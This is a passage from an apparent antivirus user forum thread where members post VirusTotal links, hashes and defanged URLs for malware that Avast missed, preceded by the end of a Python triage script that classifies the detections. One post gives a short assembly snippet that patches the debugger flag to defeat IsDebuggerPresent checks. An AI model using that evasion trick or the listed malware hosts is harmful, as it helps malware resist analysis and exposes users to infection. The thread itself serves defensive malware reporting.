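    return (now - parse_vt_time(first_seen)).total_seconds() / 3600.0


def classify(sample: dict, engine: str, blocked_hosts=frozenset(), now: datetime = NOW) -> str:
    """Apply the thread's rule of thumb for one engine against one VT record."""
    results = sample["results"]
    if results.get(engine):
        return "detected"
    if sample["host"] in blocked_hosts:
        # The hosting URL is already blocked by the web/network shield: a signature miss
        # on VT does not mean the user is exposed, and the thread asks not to report these.
        return "covered by url block"
    others = sum(1 for eng, name in results.items() if eng != engine and name)
    if others < CONSENSUS_DETECTIONS:
        # Only a few engines flag it yet: inside the vulnerability window, not overdue.
        return "vulnerability window"
    if age_hours(sample["first_seen"], now) >= LONG_OVERDUE_HOURS:
        return "long overdue"
    return "missed, recent"


def triage(samples, engine: str, blocked_hosts=frozenset(), now: datetime = NOW) -> dict[str, str]:
    """Verdict per sha256 for the given engine."""
    return {s["sha256"]: classify(s, engine, blocked_hosts, now) for s in samples}


def report_worthy(samples, engine: str, blocked_hosts=frozenset(), now: datetime = NOW) -> list[str]:
    """Hashes worth a manual sample submission: real misses not already covered by a URL block."""
    verdicts = triage(samples, engine, blocked_hosts, now)
    return [sha for sha, v in verdicts.items() if v in ("long overdue", "missed, recent")]


if __name__ == "__main__":
    for sha, verdict in triage(SAMPLES, "avast", {"blocked.example"}).items():
        print(sha[:12], verdict)
    print("submit:", [s[:12] for s in report_worthy(SAMPLES, "avast", {"blocked.example"})])
```

The point of the "covered by url block" and "vulnerability window" verdicts is the caveat polonus makes: a VT line with a blank avast column is not by itself evidence of a gap, and only the two "missed" verdicts are the ones worth a mail to the lab.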
-
Hi :)
Undetected malware.
https://www.virustotal.com/file/f6570c423a085618e86a753a068139f50df069ae9696902d2f9117000549fb2d/analysis/1356809075/
-
Trojan-Ransom.Win32.Blocker
https://www.virustotal.com/file/9da225cd393e132a152085e9ea9ca2a786240ab50115c9f22bdbffbe529edf72/analysis/1356932339/
reported to virus AT avast DOT com
-
sample is 1 year old ;D
-
1 year old, still actual: http://www.backgroundtask.eu/Systeemtaken/taakinfo/186568/Main/rss.php
latest: https://www.virustotal.com/file/f6570c423a085618e86a753a068139f50df069ae9696902d2f9117000549fb2d/analysis/
Avast will detect this as a PUP...http://minotauranalysis.com/search.aspx?q=3c07d4db52e25e7fb66f7314650bfda7
NORTON BLOCKED IP 198.153.192.4
polonus
-
CVE-2012-4792
Avast detects this one: https://www.virustotal.com/file/c6586b543ca30894a36c43a3136943bfc3b29d200dded6867d59c3147ed92903/analysis/1357224525/
This one is missed:
https://www.virustotal.com/file/e2a61961f96ae2079d38d1c4cfb6703b28f233b2a25b20951376186b8c277e94/analysis/1357547939/
Reported to Virus AT Avast DOT com.
-
An analysis from exodusintel: http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/
and one from SpiderLabs Research here: http://blog.spiderlabs.com/2013/01/dissecting-a-cve-2012-4792-payload.html?utm_source=twitterfeed&utm_medium=twitter
@true indian,
Did you post this as well? http://forums.malwarebytes.org/index.php?showtopic=120412
while you have seen this? http://stopmalvertising.com/malware-reports/cve-2012-4792-analysis-of-today.swf.html (link author = Kimberley)
polonus
-
See: https://www.virustotal.com/url/668476583e5a22997785b10062b67051af81f6895ce5a5e28e3e9c989eab666d/analysis/
and
https://www.virustotal.com/file/3e2fa77239bfd02e2004ddea2917070e0ffb9cc55a2861f25191c3fe9b5c28ce/analysis/1357507441/
see: http://urlquery.net/report.php?id=624509
reported to virus AT avast dot com
polonus
-
Hi ;)
Undetected malware:
https://www.virustotal.com/file/20525159aaaefebe6231982a52b47d4ce19cd5d3a368d9d17effd7d89c86a73e/analysis/
-
See: https://www.virustotal.com/url/b8da28d174eaabcac70543da38099fe27c32cc678abd7a98ae1e2ffa3daaa74f/analysis/1357831007/
and https://www.virustotal.com/file/da47808b4dd41ea2df8d63f6d60f6a285e20c4f4e6d862a4d4bc7055363fd47f/analysis/1357831017/ nothing
>htxp://www.audiotoolsfactory.com/download/video-converter.exe/{sys}\ac3filter.ax - file too large, skipped
see: http://anubis.iseclab.org/?action=result&task_id=165fa6d9a424fc5844d6bd28fd2ca1d1a&format=html
polonus
-
See: http://zulu.zscaler.com/submission/show/cb9a276a923e2b8550287816eb2800ed-1357835602
Missed: https://www.virustotal.com/file/1e602851a1e5254ce345a4ad5dace9d0/analysis/
Reported to virus AT avast DOT com
-
Autorun Sample.
https://www.virustotal.com/file/3d98aeea05995d456de53bdcfd46a85347dc5e9c5f210a67177251f5803857aa/analysis/1358351427/
Reported to avast labs.
-
https://www.virustotal.com/en/file/6013992376f054510ed02d6fff88c32275e152b3d32da05a92d5574562055176/analysis/1362258046/
-
Why this thread is still open ? :o
I don't think any analyst comes every day to check here; the best thing that works well is e-mail submission, the chest, or Support/Report a virus to the virus lab (in V8).
-
Why would someone even think about downloading a .rar.zip when the installer can be downloaded from the official site? Makes no sense imo.
For those interested: http://www.jetbrains.com/phpstorm/
As for this topic, I'd assume it's useless. As shown in the above example, you would have no way of knowing where the user downloaded the offending content and rather it's legit or not. Such information can determine the difference between false positive and potential malware.
-
I have said for ages this topic is a waste of time.
Most people post, but don't follow up: A. avast needs the sample sent directly and, more so, B. when the signature is added then the post should be modified to reflect that it is now included.
On point B seeing that in this topic is rarer than rocking horse droppings.
-
On point B seeing that in this topic is rarer than rocking horse droppings.
True and who is going to clean it up after rocking horse droppings ::).....................Not me I'm out and I would rather light a match ;D ;)
-
On point B seeing that in this topic is rarer than rocking horse droppings.
you can buy that ;) .... only 6.50 http://thebigrockinghorse.com.au/?p=1305
;D
-
I have said for ages this topic is a waste of time.
Most people post, but don't follow up: A. avast needs the sample sent directly and, more so, B. when the signature is added, the post should be modified to reflect that it is now included.
On point B seeing that in this topic is rarer than rocking horse droppings.
No one is able to lock it? ..
-
On point B seeing that in this topic is rarer than rocking horse droppings.
you can buy that ;) .... only 6.50 http://thebigrockinghorse.com.au/?p=1305
;D
ROFLMAO ;D ;D ;D ;D Looks Rock Solid there ;)
-
undetected malware
https://www.virustotal.com/sl/file/e302bfb198f7fcb761200a079d4e398674f5c1d5f0aeb8fd4ce1f1e7a17274de/analysis/1362406043/
-
undetected malware
https://www.virustotal.com/sl/file/e302bfb198f7fcb761200a079d4e398674f5c1d5f0aeb8fd4ce1f1e7a17274de/analysis/1362406043/
First seen by VirusTotal
2012-04-16 12:21:05 UTC (10 months, 3 weeks ago)
Yeah, must be malware ;)
-
The filename rabr.exe was last seen on 3.4.2013, and it is considered as unsafe.
Threat name
Malware
Filename
[System32Root]\rabr.exe
Filesize
Unknown
Last seen
3.4.2013
Status
Known as unsafe.
This file can perform the following behavior.
- File is created as process on the disk.
- This process can create, delete or modify files on the disk,
pol
-
https://www.virustotal.com/en/file/d9189fc6da7539be9f5c4768f902a4721473328b6fd470b0e68287f8a4e535d7/analysis/1368859977/
-
Hi mrapi,
Normally avast! should detect this as Win32:FakeAV-EAI.
Did you check for avast! shield detection?
It is a detection for a rogue/fake security tool (trojan)
polonus
-
Hi polonus, thanks for the answer, I couldn't find any setting for the shield to add rogue/fake.
That trojan should be detected by default; it acts as an antivirus and stops any application execution and asks for money to disinfect...
-
It is solved, thanks!
Hi polonus, thanks for the answer, I couldn't find any setting for the shield to add rogue/fake.
That trojan should be detected by default; it acts as an antivirus and stops any application execution and asks for money to disinfect...
-
Thanks for that feedback. I always enjoy it when we have added protection.
That is the main reason why I keep frequenting the avast webforums,
well, to aid/add to making avast! av even better than it already is...
polonus
-
you're welcome... :)
-
Chinese fake av not detected via VT file result scan: https://www.virustotal.com/nl/url/39a56bcdeaed17cf338f9ede28bd55e4809682bc1e5adf34e339873e19594a89/analysis/1369572621/
and
https://www.virustotal.com/nl/file/9b342ae7f25d65bdb817d8c995f3211ac398e41575fc5d149d994c1dcb008f0a/analysis/1365605849/
URL vip.dns-vip.net failed to be located in database...
What should be detected: http://urlquery.net/report.php?id=2637824
The recent detection pattern for the dropper: http://support.clean-mx.de/clean-mx/viruses.php?domain=dns-vip.net&sort=id%20DESC
Avast does not detect: https://www.virustotal.com/nl/file/a5eb9b868da9adebe0f23b0623f27072118431c315261bdd327ec1a6eee6364d/analysis/
The file being studied is a Portable Executable file! More specifically, it is a Win32 EXE file for the Windows GUI subsystem,
not necessarily malicious, may provide a threat!
polonus
-
What about this one: https://www.virustotal.com/nl/url/f94533b9150663a3727ff4c7101b47715f7c94ea31edc0eb1939b0dd2842996f/analysis/1369576163/
and https://www.virustotal.com/nl/file/d28a53b05b30ab450d856d85d1ba9bffc5f40ebdf899c8c31a074b372353f0a3/analysis/1369327457/
TR/Rogue.kdv.866075.20 not detected
Moreover hxtp://fsua-01.gamenet.ru/installers/qgna/bs/live/bs.exe is in Dr.Web malicious sites list!
polonus
-
This thing is all over our forum...JS autorun malware via USB.
https://www.virustotal.com/en/file/abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73/analysis/
sent to avast.
-
How is detection for File names: - c3b5bc549e274296..., 3453e448961cf479..., be227e817c7ea7e1..., defa9f7681c9969a...,
Fingerprints: f252ef92144d60b4..., 2a3a8ea7b8d2d032..., a7d0a0fb7cc0e091..., d0dcb66b8217343d..., d291a94334e46a1c..., e8b1aef6eece8f85..., 5683c3a9f2529ece...
See: http://r.virscan.org/ca892b3b26798e0672cc8803c15808c8 & http://v.virscan.org/Trojan.JS.Autorun.A%20[Aquarius].html
polonus
-
https://www.virustotal.com/nl/file/dd07e26833431f5cb2ee4c43686fdea8651940d8b8c72d2728800b42619564d8/analysis/
for htXp://zozvupeb.ru/angrim2.exe -> http://urlquery.net/report.php?id=1525619
See: http://www.backgroundtask.eu/Systeemtaken/taakinfo/184509/angrim2.exe/
polonus
-
Why Not detected!? Win64/Olmarik.AW
https://www.virustotal.com/en/file/153b6508da404e0ef02bd0ef074f97607ffddabf4be90cfc4e9e308489c02034/analysis/
No shield detection...no nothing.
Reported to virus AT avast DOT com.
-
No Clue. https://www.virustotal.com/en/url/b858a9e79fc77d11ac2c6bde20f3030b159e86196cd8a4dcf795bbab90aeb480/analysis/1370881787/
HTML Document. Chrome blocks, Avast will not. There is said to be a file download, I didn't get it.
-
See: http://www.malwaredomainlist.com/mdl.php?search=www.tdms.saglik.gov.tr
polonus
-
Yet another VBS autorun malware variant.
https://www.virustotal.com/en/file/005b007ed4b1f6f431e62d6035ce0080e08a958f45e9cc06fe7fa3ba4abe0f59/analysis/1370950728/
sent to avast. ;D
-
Someone is not following the threads here, see: http://forum.avast.com/index.php?topic=124252.0
Not so safe as was reported here: http://www.isthisfilesafe.com/sha1/F4991FB4740AB85B45EEBB5DD33D39DD88AAEB11_details.aspx
Side effects:
• Registry modification
Files It copies itself to the following location:
• %temp%\Updatea.vbs
Threat considered low damage, avast could detect this as PUP/riskware...
polonus
-
Good find Pol, shows how fast these things spread :)
-
Again FUD autorun sample >:(
https://www.virustotal.com/en/file/3ff323e2bd69cab9f2a015f1df6402c96477c6591625bcb73c6defa597f0d6e7/analysis/1371289602/
https://www.virustotal.com/en/file/a293e9a0edb0c34de2b348ffa053a2ee4c965a5b678fd545a81ea16414494dc4/analysis/1371289603/
submitted to avast.
EDIT: WTF, one of the samples is 4 days old and still FUD, no AV vendor sees it yet :o :o :o :o:
First submission 2013-06-11 08:24:31 UTC ( 4 days, 1 hour ago )
-
These samples were found here: http://forums.malwarebytes.org/index.php?showtopic=127787
and also submitted here: http://support.emsisoft.com/topic/11569-true-indians-submissions/
i04040.js for instance should be detected by avast as HTML:Iframe-MS [Trj]
polonus
-
Bad Boys gathered from USB
https://www.virustotal.com/en/file/c379ef4ffe8bd8abd5a3cb31a76c55de6946a1756a62d26398d27c3222f54e5b/analysis/1372086166/
https://www.virustotal.com/en/file/96b11e12f04062130ae4155d7dc6395735f61d829fa3b4eaf371af89e4acf944/analysis/1372086268/
https://www.virustotal.com/en/file/42257f704c68bb9bb4b10e3a670d859551d971c9addc1e126a8543daebcb5595/analysis/1372086319/
https://www.virustotal.com/en/file/c7bd252296272693d8ad658295de6ca89c6c0dd42c054ebb58f571aad1d8cc1f/analysis/1372086748/
Sent to avast and reported to MBAM.
-
There should be no distribution of samples via this forum, it is a support forum and not a quasi malware distribution service.
-
There should be no distribution of samples via this forum, it is a support forum and not a quasi malware distribution service.
Oops! Many apologies, David.. I have removed that from my reply. I was only saying that because if anyone else wants to circulate the samples to some other AV vendors, but I will take a note of that.
-
https://www.virustotal.com/de/file/55719cc99fcc00e38a00e67c1b34cc031f37dae73094b188627189559aca056f/analysis/
https://www.virustotal.com/de/file/a2c2339691fc48fbd14fb307292dff3e21222712d9240810742d7df0c6d74dfb/analysis/
https://www.virustotal.com/de/file/78c3b546d51b60c014764681feba004bee69c2bec1531667117adf2a823fd4d2/analysis/
https://www.virustotal.com/de/file/bab2f1e61b9dacabd4cb0e51238af7418a23499626a4ed005db7bd818fc00cf1/analysis/
https://www.virustotal.com/de/file/60c722ed7e6f15ad5bf55ca4a8f9c83e127001021fef93651c71e0dda84f270c/analysis/
https://www.virustotal.com/de/file/4a23542d116fc351f8016e5f24146c0256ffea910393f80ffac71e90b9d2152b/analysis/
https://www.virustotal.com/de/file/3c26ac826b462b67f7eb81dde234e74acbd59335512a1de038f49c10c1fa0668/analysis/
https://www.virustotal.com/de/file/a2c2339691fc48fbd14fb307292dff3e21222712d9240810742d7df0c6d74dfb/analysis/1373298617/
https://www.virustotal.com/de/file/1ab214bcb937d9baa981ccd9f9b13661c758ffe081b44b437db7aeb9fa7b3ca1/analysis/
-
https://www.virustotal.com/de/url/4dd7770bb0d2ba7d1a22ca558dc820389df49a2376a0f866f7322db0e1718390/analysis/
https://www.virustotal.com/de/file/0e0e477684bb8d0a6ada4b646c07d94e42046c0096c7b402c9eb3b1c3085d571/analysis/
https://www.virustotal.com/de/file/677933e1bb7d64297f03ce8b3118a11c261e6550532640b0cd708e3832a7a1e9/analysis/
https://www.virustotal.com/de/file/f3efcd13e0fdf8784296c77ba42889e01489f5329baf40a5a6fd163f2be09609/analysis/
https://www.virustotal.com/de/file/55719cc99fcc00e38a00e67c1b34cc031f37dae73094b188627189559aca056f/analysis/
https://www.virustotal.com/de/file/78c3b546d51b60c014764681feba004bee69c2bec1531667117adf2a823fd4d2/analysis/
https://www.virustotal.com/de/file/bab2f1e61b9dacabd4cb0e51238af7418a23499626a4ed005db7bd818fc00cf1/analysis/
https://www.virustotal.com/de/file/60c722ed7e6f15ad5bf55ca4a8f9c83e127001021fef93651c71e0dda84f270c/analysis/
https://www.virustotal.com/de/file/4a23542d116fc351f8016e5f24146c0256ffea910393f80ffac71e90b9d2152b/analysis/
https://www.virustotal.com/de/file/3c26ac826b462b67f7eb81dde234e74acbd59335512a1de038f49c10c1fa0668/analysis/
-
https://www.virustotal.com/de/file/83eac1bc7aa643e82215911f7fc5bbae1e9c0bf290d02f1ba2783c264891d60a/analysis/
https://www.virustotal.com/de/file/164864255d356996cd8111dd74b5b2733fa578a60081a433eb6ff8ee70315281/analysis/
https://www.virustotal.com/de/file/afaae780f6d98834728b31b799cf1f094c4429398a54702946d68ea7642aec98/analysis/
https://www.virustotal.com/de/file/22cd8de3dcba2fb38cd8b4a11c39c899f8ce5441f6020d7aff5c4e789b1b593a/analysis/
https://www.virustotal.com/de/file/41b87401075228c0d8129e3a8522f1ab6ca4fb592aacbff53c241a14cfafa7b4/analysis/
https://www.virustotal.com/de/file/a4661ed1dff681b214f04a22c57ef06bbe79ea57c51f10eaca61f9364e267559/analysis/
https://www.virustotal.com/de/file/893fcdfdc1797eaea7d56d92f98068b27d1b68f9eaadd17495118a4d7c6d4885/analysis/
https://www.virustotal.com/de/file/315f9a5fcd45dc3a3cad55d74e59a445b9758319bf286cb9ae9bb3cb1d56e15b/analysis/
https://www.virustotal.com/de/file/237bedfebbcce3d2751c49cf6cc6f879ce4a81ee34eaee74f053e3706a5ded68/analysis/
https://www.virustotal.com/de/file/393215b42032762ec30cfebf731fd7756fcd9c6535032ea5f78f0e9b74831805/analysis/
https://www.virustotal.com/de/file/0a18573765d6e32a12c070ea5fbfd09b848ad24281ff315450121dca274322dd/analysis/
https://www.virustotal.com/de/file/8b66cd525e28891f8d57bb1c7ea502c1f61e9d3dd9deb7045b744d9b41e460e5/analysis/
https://www.virustotal.com/de/file/f0f903dcbd8df45681478cf11b8a5ae405b9705350dc3b94130eccdb12e46216/analysis/
https://www.virustotal.com/de/file/de19110db290c4bcb94d0d9302a6c44c976bde1389c75cecd245363627e16123/analysis/
-
TheBeateMaker, are you sending all samples to avast via virus@avast.com through e-mail? If not, then posting links here will be of no use.
-
See, for various samples posted there is avast detection now, e.g.
https://www.virustotal.com/de/file/164864255d356996cd8111dd74b5b2733fa578a60081a433eb6ff8ee70315281/analysis/
https://www.virustotal.com/de/file/83eac1bc7aa643e82215911f7fc5bbae1e9c0bf290d02f1ba2783c264891d60a/analysis/
polonus
-
https://www.virustotal.com/en/file/1a7f702a9b5a88d2f0e1047f4be6a37a52b8c3a95ab156db389e6a509c409277/analysis/1373544700/
PUP file, deemed safe by Essex.
-
IDS flagged it here: http://urlquery.net/report.php?id=3533128
Loaded will be kernel32.dll (where IsDebuggerPresent is located).
The circumvention is for a particular code example!
mov eax,dword ptr fs:[18]
mov eax,dword ptr ds:[EAX+30]
mov byte ptr ds:[eax+2],0
This will patch the IsPresent flag, ensuring IsDebuggerPresent always returns 0
(credits go to kuba on reverse engineering)
Adware - two detections in latest scan: https://www.virustotal.com/en/file/411240f7d25a1a63a68b0874eb8d122c3b2c2e0bddb94eee55818b6a535b6915/analysis/ (installer detection -> Global\Phoenix_Installer (failed) & RasPbFile (failed); this issue is a class of bug called a "Token Leak")....
polonus
-
https://www.virustotal.com/en/file/619531aa8bf0000586f23549475d523b36ac70a0f916ba17ddf9586137d532f4/analysis/1374143415/
Adware. It was "supposed" to be a movie. I noticed the .exe part at the end. I figured it'd be malicious, thought I'd see what I could do to help. This seems like a good place.
-
https://www.virustotal.com/en/file/619531aa8bf0000586f23549475d523b36ac70a0f916ba17ddf9586137d532f4/analysis/1374143415/
Adware. It was "supposed" to be a movie. I noticed the .exe part at the end. I figured it'd be malicious, thought I'd see what I could do to help. This seems like a good place.
Send the file to virus@avast.com via mail, don't report it here, it is not going to help avast in any way :)
-
True Indian, I tried to do that. But gmail is being a * today and is saying it won't allow me. Virus obviously. Any other way? I've tried compressing it, renaming the extension from .exe to .part.
Any help is awesome.
Thanks
Michael
-
True Indian, I tried to do that. But gmail is being a * today and is saying it won't allow me. Virus obviously. Any other way? I've tried compressing it, renaming the extension from .exe to .part.
Any help is awesome.
Thanks
Michael
Hi Buddy,
You can simply archive your sample using 7-zip and password protect it. The password should be: infected
Be sure to mention the password in the mail body and provide some additional info on the source of the sample, e.g. site address, IP, VirusTotal scan link etc.
-
Will do. Thanks
-
Hello true indian and alan1998,
Good you two reported here.
It is the installer that is involved and that installer (wrapper) should be detected as junkware laden.
See the Sophos analysis here: http://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/InstallRex/detailed-analysis.aspx
This is something we see happening more and more and it is really frustrating for those users
who download a legit program and are troubled by nasty and very hard to uninstall crap- and junkware.
CNet downloads also come with this uninvited junk installer for their downloads.
Just google this combination: installmate adware, and you get much interesting info, my good friends.
Adware InstallMate
SHA256: ecf7e1de8ef7a049a1abb3fb36e8b47786b7d96aa5123a4e86e2a3a44bbe11b0
SHA1: b87fe0346097f3b49b7fb01b85ef0004162bfc5a
MD5: 5192e5dcdbfc466042f55386a03f89a3
File size: 305456 bytes
Created files:
%WinDir%\TEMP\Tsu6193197D.dll – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\Setup.exe – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\_Setup.dll – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\_Setupx.dll – Adware InstallMate
polonus
-
Already submitted this file 2 times but it's not detected yet:
https://www.virustotal.com/pt/file/931d08a2c2ea526ac631a2d03fd8fb916d724b7e0e74bd6e82ef53ad6bb4074a/analysis/1374800638/
-
https://www.virustotal.com/en/file/2c6e6d0af78e09051b795e0d1cfba32d51d620a2731c9f48931a7e921fbbf002/analysis/1376371996/
https://www.virustotal.com/en/file/d796dc13c8ec119d6f96c8b3b5f8af1012ad19a838ec3dbdd03603e06210ef28/analysis/1376372006/
https://www.virustotal.com/en/file/7a9cc4cdcf4aa4c7c78c2ef47af3d5234597004a48b087feb3510bfebc4aeb83/analysis/1376374833/
-
Hi Mrapi,
Thanks for helping in sending undetected samples to avast. Hopefully, you are submitting them to avast via e-mail or via the avast virus chest. :)
-
Hi true indian,
This one reported above has some low detection rates: http://f.virscan.org/quarantine.zip.html
and just watch here: http://r.virscan.org/f06fbf6719e0f5909416043d64ecca56
polonus
-
I have no sample, a variant Trojan LNK not detected
https://www.virustotal.com/en/file/4148f39bc53f587b3777551c770fd2b372fa00414d3447b2854e623ef97b12c1/analysis/
-
https://www.virustotal.com/en/file/94c193fe61207b3fe74e313309cdf65884f61307011729a1c7d640d0c85de4d0/analysis/1399226305/
Sample emailed to AVAST
-
You will have noticed this topic hasn't been used for some time (13 August 2013, 15:22:44) as it is pointless - the only action worth anything is the submission to avast.
Avast can do nothing with a VT reference link, it needs only the sample.
-
Okie Dokie